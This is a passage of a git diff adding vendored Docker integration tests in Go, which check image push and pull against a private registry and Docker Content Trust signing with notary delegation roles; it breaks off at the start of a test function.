+
+	// Create another delegation that we'll sign with
+	s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[1].Public)
+	s.notaryImportKey(c, repoName, "targets/other", s.not.keys[1].Private)
+	s.notaryPublish(c, repoName)
+
+	dockerCmd(c, "tag", "busybox", targetName)
+	pushCmd = exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err = runCommandWithOutput(pushCmd)
+	s.assertTargetInRoles(c, repoName, "latest", "targets", "targets/releases", "targets/other")
+
+	// Try pull, check we retrieve from targets/releases role
+	pullCmd = exec.Command(dockerBinary, "-D", "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(out, checker.Contains, "retrieving target for targets/releases role")
+}
+
+func (s *DockerTrustSuite) TestTrustedPullIgnoresOtherDelegationRoles(c *check.C) {
+	testRequires(c, NotaryHosting)
+	repoName := fmt.Sprintf("%v/dockerclipullotherdelegation/trusted", privateRegistryURL)
+	targetName := fmt.Sprintf("%s:latest", repoName)
+
+	// We'll create a repo first with a non-release delegation role, so that when we
+	// push we'll sign it into the delegation role
+	s.notaryInitRepo(c, repoName)
+	s.notaryCreateDelegation(c, repoName, "targets/other", s.not.keys[0].Public)
+	s.notaryImportKey(c, repoName, "targets/other", s.not.keys[0].Private)
+	s.notaryPublish(c, repoName)
+
+	// Push should write to the delegation role, not targets
+	dockerCmd(c, "tag", "busybox", targetName)
+	pushCmd := exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	s.assertTargetInRoles(c, repoName, "latest", "targets/other")
+	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
+
+	// Try pull - we should fail, since pull will only pull from the targets/releases
+	// role or the targets role
+	pullCmd := exec.Command(dockerBinary, "-D", "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "No trust data for")
+
+	// try a pull -a: we should fail since pull will only pull from the targets/releases
+	// role or the targets role
+	pullCmd = exec.Command(dockerBinary, "-D", "pull", "-a", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "No trusted tags for")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go
new file mode 100644
index 0000000000..f750c12674
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_push_test.go
@@ -0,0 +1,715 @@
+package main
+
+import (
+	"archive/tar"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"net/http/httptest"
+	"os"
+	"os/exec"
+	"path/filepath"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/docker/distribution/reference"
+	"github.com/docker/docker/cliconfig"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// Pushing an image to a private registry.
+func testPushBusyboxImage(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	// tag the image to upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	// push the image to the registry
+	dockerCmd(c, "push", repoName)
+}
+
+func (s *DockerRegistrySuite) TestPushBusyboxImage(c *check.C) {
+	testPushBusyboxImage(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPushBusyboxImage(c *check.C) {
+	testPushBusyboxImage(c)
+}
+
+// pushing an image without a prefix should throw an error
+func (s *DockerSuite) TestPushUnprefixedRepo(c *check.C) {
+	out, _, err := dockerCmdWithError("push", "busybox")
+	c.Assert(err, check.NotNil, check.Commentf("pushing an unprefixed repo didn't result in a non-zero exit status: %s", out))
+}
+
+func testPushUntagged(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	expected := "An image does not exist locally with the tag"
+
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf("pushing the image to the private registry should have failed: output %q", out))
+	c.Assert(out, checker.Contains, expected, check.Commentf("pushing the image failed"))
+}
+
+func (s *DockerRegistrySuite) TestPushUntagged(c *check.C) {
+	testPushUntagged(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPushUntagged(c *check.C) {
+	testPushUntagged(c)
+}
+
+func testPushBadTag(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox:latest", privateRegistryURL)
+	expected := "does not exist"
+
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf("pushing the image to the private registry should have failed: output %q", out))
+	c.Assert(out, checker.Contains, expected, check.Commentf("pushing the image failed"))
+}
+
+func (s *DockerRegistrySuite) TestPushBadTag(c *check.C) {
+	testPushBadTag(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPushBadTag(c *check.C) {
+	testPushBadTag(c)
+}
+
+func testPushMultipleTags(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	repoTag1 := fmt.Sprintf("%v/dockercli/busybox:t1", privateRegistryURL)
+	repoTag2 := fmt.Sprintf("%v/dockercli/busybox:t2", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoTag1)
+
+	dockerCmd(c, "tag", "busybox", repoTag2)
+
+	dockerCmd(c, "push", repoName)
+
+	// Ensure layer list is equivalent for repoTag1 and repoTag2
+	out1, _ := dockerCmd(c, "pull", repoTag1)
+
+	imageAlreadyExists := ": Image already exists"
+	var out1Lines []string
+	for _, outputLine := range strings.Split(out1, "\n") {
+		if strings.Contains(outputLine, imageAlreadyExists) {
+			out1Lines = append(out1Lines, outputLine)
+		}
+	}
+
+	out2, _ := dockerCmd(c, "pull", repoTag2)
+
+	var out2Lines []string
+	for _, outputLine := range strings.Split(out2, "\n") {
+		if strings.Contains(outputLine, imageAlreadyExists) {
+			out1Lines = append(out1Lines, outputLine)
+		}
+	}
+	c.Assert(out2Lines, checker.HasLen, len(out1Lines))
+
+	for i := range out1Lines {
+		c.Assert(out1Lines[i], checker.Equals, out2Lines[i])
+	}
+}
+
+func (s *DockerRegistrySuite) TestPushMultipleTags(c *check.C) {
+	testPushMultipleTags(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPushMultipleTags(c *check.C) {
+	testPushMultipleTags(c)
+}
+
+func testPushEmptyLayer(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/emptylayer", privateRegistryURL)
+	emptyTarball, err := ioutil.TempFile("", "empty_tarball")
+	c.Assert(err, check.IsNil, check.Commentf("Unable to create test file"))
+
+	tw := tar.NewWriter(emptyTarball)
+	err = tw.Close()
+	c.Assert(err, check.IsNil, check.Commentf("Error creating empty tarball"))
+
+	freader, err := os.Open(emptyTarball.Name())
+	c.Assert(err, check.IsNil, check.Commentf("Could not open test tarball"))
+	defer freader.Close()
+
+	importCmd := exec.Command(dockerBinary, "import", "-", repoName)
+	importCmd.Stdin = freader
+	out, _, err := runCommandWithOutput(importCmd)
+	c.Assert(err, check.IsNil, check.Commentf("import failed: %q", out))
+
+	// Now verify we can push it
+	out, _, err = dockerCmdWithError("push", repoName)
+	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out))
+}
+
+func (s *DockerRegistrySuite) TestPushEmptyLayer(c *check.C) {
+	testPushEmptyLayer(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestPushEmptyLayer(c *check.C) {
+	testPushEmptyLayer(c)
+}
+
+// testConcurrentPush pushes multiple tags to the same repo
+// concurrently.
+func testConcurrentPush(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+
+	repos := []string{}
+	for _, tag := range []string{"push1", "push2", "push3"} {
+		repo := fmt.Sprintf("%v:%v", repoName, tag)
+		_, err := buildImage(repo, fmt.Sprintf(`
+	FROM busybox
+	ENTRYPOINT ["/bin/echo"]
+	ENV FOO foo
+	ENV BAR bar
+	CMD echo %s
+`, repo), true)
+		c.Assert(err, checker.IsNil)
+		repos = append(repos, repo)
+	}
+
+	// Push tags, in parallel
+	results := make(chan error)
+
+	for _, repo := range repos {
+		go func(repo string) {
+			_, _, err := runCommandWithOutput(exec.Command(dockerBinary, "push", repo))
+			results <- err
+		}(repo)
+	}
+
+	for range repos {
+		err := <-results
+		c.Assert(err, checker.IsNil, check.Commentf("concurrent push failed with error: %v", err))
+	}
+
+	// Clear local images store.
+	args := append([]string{"rmi"}, repos...)
+	dockerCmd(c, args...)
+
+	// Re-pull and run individual tags, to make sure pushes succeeded
+	for _, repo := range repos {
+		dockerCmd(c, "pull", repo)
+		dockerCmd(c, "inspect", repo)
+		out, _ := dockerCmd(c, "run", "--rm", repo)
+		c.Assert(strings.TrimSpace(out), checker.Equals, "/bin/sh -c echo "+repo)
+	}
+}
+
+func (s *DockerRegistrySuite) TestConcurrentPush(c *check.C) {
+	testConcurrentPush(c)
+}
+
+func (s *DockerSchema1RegistrySuite) TestConcurrentPush(c *check.C) {
+	testConcurrentPush(c)
+}
+
+func (s *DockerRegistrySuite) TestCrossRepositoryLayerPush(c *check.C) {
+	sourceRepoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	// tag the image to upload it to the private registry
+	dockerCmd(c, "tag", "busybox", sourceRepoName)
+	// push the image to the registry
+	out1, _, err := dockerCmdWithError("push", sourceRepoName)
+	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out1))
+	// ensure that none of the layers were mounted from another repository during push
+	c.Assert(strings.Contains(out1, "Mounted from"), check.Equals, false)
+
+	digest1 := reference.DigestRegexp.FindString(out1)
+	c.Assert(len(digest1), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest"))
+
+	destRepoName := fmt.Sprintf("%v/dockercli/crossrepopush", privateRegistryURL)
+	// retag the image to upload the same layers to another repo in the same registry
+	dockerCmd(c, "tag", "busybox", destRepoName)
+	// push the image to the registry
+	out2, _, err := dockerCmdWithError("push", destRepoName)
+	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2))
+	// ensure that layers were mounted from the first repo during push
+	c.Assert(strings.Contains(out2, "Mounted from dockercli/busybox"), check.Equals, true)
+
+	digest2 := reference.DigestRegexp.FindString(out2)
+	c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest"))
+	c.Assert(digest1, check.Equals, digest2)
+
+	// ensure that pushing again produces the same digest
+	out3, _, err := dockerCmdWithError("push", destRepoName)
+	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2))
+
+	digest3 := reference.DigestRegexp.FindString(out3)
+	c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest"))
+	c.Assert(digest3, check.Equals, digest2)
+
+	// ensure that we can pull and run the cross-repo-pushed repository
+	dockerCmd(c, "rmi", destRepoName)
+	dockerCmd(c, "pull", destRepoName)
+	out4, _ := dockerCmd(c, "run", destRepoName, "echo", "-n", "hello world")
+	c.Assert(out4, check.Equals, "hello world")
+}
+
+func (s *DockerSchema1RegistrySuite) TestCrossRepositoryLayerPushNotSupported(c *check.C) {
+	sourceRepoName := fmt.Sprintf("%v/dockercli/busybox", privateRegistryURL)
+	// tag the image to upload it to the private registry
+	dockerCmd(c, "tag", "busybox", sourceRepoName)
+	// push the image to the registry
+	out1, _, err := dockerCmdWithError("push", sourceRepoName)
+	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out1))
+	// ensure that none of the layers were mounted from another repository during push
+	c.Assert(strings.Contains(out1, "Mounted from"), check.Equals, false)
+
+	digest1 := reference.DigestRegexp.FindString(out1)
+	c.Assert(len(digest1), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest"))
+
+	destRepoName := fmt.Sprintf("%v/dockercli/crossrepopush", privateRegistryURL)
+	// retag the image to upload the same layers to another repo in the same registry
+	dockerCmd(c, "tag", "busybox", destRepoName)
+	// push the image to the registry
+	out2, _, err := dockerCmdWithError("push", destRepoName)
+	c.Assert(err, check.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out2))
+	// schema1 registry should not support cross-repo layer mounts, so ensure that this does not happen
+	c.Assert(strings.Contains(out2, "Mounted from"), check.Equals, false)
+
+	digest2 := reference.DigestRegexp.FindString(out2)
+	c.Assert(len(digest2), checker.GreaterThan, 0, check.Commentf("no digest found for pushed manifest"))
+	c.Assert(digest1, check.Not(check.Equals), digest2)
+
+	// ensure that we can pull and run the second pushed repository
+	dockerCmd(c, "rmi", destRepoName)
+	dockerCmd(c, "pull", destRepoName)
+	out3, _ := dockerCmd(c, "run", destRepoName, "echo", "-n", "hello world")
+	c.Assert(out3, check.Equals, "hello world")
+}
+
+func (s *DockerTrustSuite) TestTrustedPush(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclitrusted/pushtest:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
+
+	// Try pull after push
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
+
+	// Assert that we rotated the snapshot key to the server by checking our local keystore
+	contents, err := ioutil.ReadDir(filepath.Join(cliconfig.ConfigDir(), "trust/private/tuf_keys", privateRegistryURL, "dockerclitrusted/pushtest"))
+	c.Assert(err, check.IsNil, check.Commentf("Unable to read local tuf key files"))
+	// Check that we only have 1 key (targets key)
+	c.Assert(contents, checker.HasLen, 1)
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithEnvPasswords(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclienv/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmdWithPassphrases(pushCmd, "12345678", "12345678")
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
+
+	// Try pull after push
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithFailingServer(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclitrusted/failingserver:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	// Using a name that doesn't resolve to an address makes this test faster
+	s.trustedCmdWithServer(pushCmd, "https://server.invalid:81/")
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.NotNil, check.Commentf("Missing error while running trusted push w/ no server"))
+	c.Assert(out, checker.Contains, "error contacting notary server", check.Commentf("Missing expected output on trusted push"))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithoutServerAndUntrusted(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclitrusted/trustedandnot:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", "--disable-content-trust", repoName)
+	// Using a name that doesn't resolve to an address makes this test faster
+	s.trustedCmdWithServer(pushCmd, "https://server.invalid")
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push with no server and --disable-content-trust failed: %s\n%s", err, out))
+	c.Assert(out, check.Not(checker.Contains), "Error establishing connection to notary repository", check.Commentf("Missing expected output on trusted push with --disable-content-trust:"))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithExistingTag(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclitag/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+	dockerCmd(c, "push", repoName)
+
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
+
+	// Try pull after push
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithExistingSignedTag(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclipushpush/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	// Do a trusted push
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
+
+	// Do another trusted push
+	pushCmd = exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err = runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
+
+	dockerCmd(c, "rmi", repoName)
+
+	// Try pull to ensure the double push did not break our ability to pull
+	pullCmd := exec.Command(dockerBinary, "pull", repoName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf("Error running trusted pull: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Status: Downloaded", check.Commentf("Missing expected output on trusted pull with --disable-content-trust"))
+
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithIncorrectPassphraseForNonRoot(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockercliincorretpwd/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	// Push with default passphrases
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push:\n%s", out))
+
+	// Push with wrong passphrases
+	pushCmd = exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmdWithPassphrases(pushCmd, "12345678", "87654321")
+	out, _, err = runCommandWithOutput(pushCmd)
+	c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with short targets passphrase: \n%s", out))
+	c.Assert(out, checker.Contains, "could not find necessary signing keys", check.Commentf("Missing expected output on trusted push with short targets/snapsnot passphrase"))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithExpiredSnapshot(c *check.C) {
+	c.Skip("Currently changes system time, causing instability")
+	repoName := fmt.Sprintf("%v/dockercliexpiredsnapshot/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	// Push with default passphrases
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
+
+	// Snapshots last for three years. This should be expired
+	fourYearsLater := time.Now().Add(time.Hour * 24 * 365 * 4)
+
+	runAtDifferentDate(fourYearsLater, func() {
+		// Push with wrong passphrases
+		pushCmd = exec.Command(dockerBinary, "push", repoName)
+		s.trustedCmd(pushCmd)
+		out, _, err = runCommandWithOutput(pushCmd)
+		c.Assert(err, check.NotNil, check.Commentf("Error missing from trusted push with expired snapshot: \n%s", out))
+		c.Assert(out, checker.Contains, "repository out-of-date", check.Commentf("Missing expected output on trusted push with expired snapshot"))
+	})
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithExpiredTimestamp(c *check.C) {
+	c.Skip("Currently changes system time, causing instability")
+	repoName := fmt.Sprintf("%v/dockercliexpiredtimestamppush/trusted:latest", privateRegistryURL)
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", repoName)
+
+	// Push with default passphrases
+	pushCmd := exec.Command(dockerBinary, "push", repoName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push"))
+
+	// The timestamps expire in two weeks. Lets check three
+	threeWeeksLater := time.Now().Add(time.Hour * 24 * 21)
+
+	// Should succeed because the server transparently re-signs one
+	runAtDifferentDate(threeWeeksLater, func() {
+		pushCmd := exec.Command(dockerBinary, "push", repoName)
+		s.trustedCmd(pushCmd)
+		out, _, err := runCommandWithOutput(pushCmd)
+		c.Assert(err, check.IsNil, check.Commentf("Error running trusted push: %s\n%s", err, out))
+		c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with expired timestamp"))
+	})
+}
+
+func (s *DockerTrustSuite) TestTrustedPushWithReleasesDelegationOnly(c *check.C) {
+	testRequires(c, NotaryHosting)
+	repoName := fmt.Sprintf("%v/dockerclireleasedelegationinitfirst/trusted", privateRegistryURL)
+	targetName := fmt.Sprintf("%s:latest", repoName)
+	s.notaryInitRepo(c, repoName)
+	s.notaryCreateDelegation(c, repoName, "targets/releases", s.not.keys[0].Public)
+	s.notaryPublish(c, repoName)
+
+	s.notaryImportKey(c, repoName, "targets/releases", s.not.keys[0].Private)
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", targetName)
+
+	pushCmd := exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
+	// check to make sure that the target has been added to targets/releases and not targets
+	s.assertTargetInRoles(c, repoName, "latest", "targets/releases")
+	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
+
+	// Try pull after push
+	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
+
+	pullCmd := exec.Command(dockerBinary, "pull", targetName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.IsNil, check.Commentf(out))
+	c.Assert(string(out), checker.Contains, "Status: Image is up to date", check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushSignsAllFirstLevelRolesWeHaveKeysFor(c *check.C) {
+	testRequires(c, NotaryHosting)
+	repoName := fmt.Sprintf("%v/dockerclimanyroles/trusted", privateRegistryURL)
+	targetName := fmt.Sprintf("%s:latest", repoName)
+	s.notaryInitRepo(c, repoName)
+	s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public)
+	s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public)
+	s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public)
+
+	// import everything except the third key
+	s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private)
+	s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private)
+
+	s.notaryCreateDelegation(c, repoName, "targets/role1/subrole", s.not.keys[3].Public)
+	s.notaryImportKey(c, repoName, "targets/role1/subrole", s.not.keys[3].Private)
+
+	s.notaryPublish(c, repoName)
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", targetName)
+
+	pushCmd := exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
+
+	// check to make sure that the target has been added to targets/role1 and targets/role2, and
+	// not targets (because there are delegations) or targets/role3 (due to missing key) or
+	// targets/role1/subrole (due to it being a second level delegation)
+	s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role2")
+	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
+
+	// Try pull after push
+	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
+
+	// pull should fail because none of these are the releases role
+	pullCmd := exec.Command(dockerBinary, "pull", targetName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushSignsForRolesWithKeysAndValidPaths(c *check.C) {
+	repoName := fmt.Sprintf("%v/dockerclirolesbykeysandpaths/trusted", privateRegistryURL)
+	targetName := fmt.Sprintf("%s:latest", repoName)
+	s.notaryInitRepo(c, repoName)
+	s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public, "l", "z")
+	s.notaryCreateDelegation(c, repoName, "targets/role2", s.not.keys[1].Public, "x", "y")
+	s.notaryCreateDelegation(c, repoName, "targets/role3", s.not.keys[2].Public, "latest")
+	s.notaryCreateDelegation(c, repoName, "targets/role4", s.not.keys[3].Public, "latest")
+
+	// import everything except the third key
+	s.notaryImportKey(c, repoName, "targets/role1", s.not.keys[0].Private)
+	s.notaryImportKey(c, repoName, "targets/role2", s.not.keys[1].Private)
+	s.notaryImportKey(c, repoName, "targets/role4", s.not.keys[3].Private)
+
+	s.notaryPublish(c, repoName)
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", targetName)
+
+	pushCmd := exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.IsNil, check.Commentf("trusted push failed: %s\n%s", err, out))
+	c.Assert(out, checker.Contains, "Signing and pushing trust metadata", check.Commentf("Missing expected output on trusted push with existing tag"))
+
+	// check to make sure that the target has been added to targets/role1 and targets/role4, and
+	// not targets (because there are delegations) or targets/role2 (due to path restrictions) or
+	// targets/role3 (due to missing key)
+	s.assertTargetInRoles(c, repoName, "latest", "targets/role1", "targets/role4")
+	s.assertTargetNotInRoles(c, repoName, "latest", "targets")
+
+	// Try pull after push
+	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
+
+	// pull should fail because none of these are the releases role
+	pullCmd := exec.Command(dockerBinary, "pull", targetName)
+	s.trustedCmd(pullCmd)
+	out, _, err = runCommandWithOutput(pullCmd)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+}
+
+func (s *DockerTrustSuite) TestTrustedPushDoesntSignTargetsIfDelegationsExist(c *check.C) {
+	testRequires(c, NotaryHosting)
+	repoName := fmt.Sprintf("%v/dockerclireleasedelegationnotsignable/trusted", privateRegistryURL)
+	targetName := fmt.Sprintf("%s:latest", repoName)
+	s.notaryInitRepo(c, repoName)
+	s.notaryCreateDelegation(c, repoName, "targets/role1", s.not.keys[0].Public)
+	s.notaryPublish(c, repoName)
+
+	// do not import any delegations key
+
+	// tag the image and upload it to the private registry
+	dockerCmd(c, "tag", "busybox", targetName)
+
+	pushCmd := exec.Command(dockerBinary, "push", targetName)
+	s.trustedCmd(pushCmd)
+	out, _, err := runCommandWithOutput(pushCmd)
+	c.Assert(err, check.NotNil, check.Commentf("trusted push succeeded but should have failed:\n%s", out))
+	c.Assert(out, checker.Contains, "no valid signing keys",
+		check.Commentf("Missing expected output on trusted push without keys"))
+
+	s.assertTargetNotInRoles(c, repoName, "latest", "targets", "targets/role1")
+}
+
+func (s *DockerRegistryAuthHtpasswdSuite) TestPushNoCredentialsNoRetry(c *check.C) {
+	repoName := fmt.Sprintf("%s/busybox", privateRegistryURL)
+	dockerCmd(c, "tag", "busybox", repoName)
+	out, _, err := dockerCmdWithError("push", repoName)
+	c.Assert(err, check.NotNil, check.Commentf(out))
+	c.Assert(out, check.Not(checker.Contains), "Retrying")
+	c.Assert(out, checker.Contains, "no basic auth credentials")
+}
+
+// This may be flaky but it's needed not to regress on unauthorized push, see #21054
+func (s *DockerSuite) TestPushToCentralRegistryUnauthorized(c *check.C) {
